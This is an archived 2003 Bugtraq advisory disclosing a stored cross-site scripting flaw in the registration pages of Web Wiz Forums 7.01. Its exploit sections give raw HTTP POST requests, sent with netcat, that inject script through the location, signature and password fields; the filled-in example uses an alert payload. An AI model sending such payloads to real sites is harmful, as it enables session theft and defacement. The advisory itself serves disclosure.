lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 13 Nov 2003 22:37:23 +0300
From: HEX <hex@....net.ru>
To: bugtraq@...urityfocus.com, info@...wizguide.info
Subject: Web Wiz Forums ver. 7.01


Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Website : http://www.webwizforums.com
Problems : Permanent XSS


Objects :
°°°°°°°
- register_new_user.asp
- register.asp

The values variable are not filtered:

strLocation = Request.Form("location")
strMessage = Request.Form("signature")
strPassword = Request.Form("password")


Exploits :
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=">[CODE]
password2=">[CODE]
email=support%40microsoft.com
emailShow=True
location=">[CODE]
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=">[CODE]
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF

P.S. The value NAME should coincide with whose that by a nick from a forum !!!


Example:
°°°°°°°°
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
email=support%40microsoft.com
emailShow=True
location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF


Patch/More Details :
°°°°°°°°°°°°°°°°°°
There was no opportunity to check up it on the version 7.5 and 7.51 :(
Waiting for the reply from technical support at http://www.webwizforums.com ...


[ Local time 21:50   | Пpоклятая йцукен, и как с ней только люди живут... ]
[ Copyright by [HEX] | mailto:hex@....net.ru ]




Powered by blists - more mailing lists